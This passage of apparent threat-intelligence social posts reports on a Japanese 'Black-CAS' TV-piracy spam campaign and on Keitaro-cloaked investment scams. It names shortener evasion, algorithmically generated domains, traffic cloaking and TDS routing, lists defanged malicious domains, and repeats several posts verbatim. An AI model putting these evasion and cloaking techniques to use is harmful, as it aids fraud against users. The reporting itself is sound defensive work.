    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  51. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  52. 🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

    We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

    Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

    The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

    The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

    At the landing pages, users can directly purchase these devices, as seen in the images below.

    This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

  53. We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

    🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

    The campaign setup is all too familiar:

    - Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
    - Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
    - Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
    - Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
    - TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

    The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

    Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

  54. We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

    🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

    The campaign setup is all too familiar:

    - Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
    - Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
    - Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
    - Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
    - TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

    The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

    Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

  55. We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

    🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

    The campaign setup is all too familiar:

    - Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
    - Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
    - Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
    - Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
    - TDS routing: TDS redircts funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

    The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

    Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking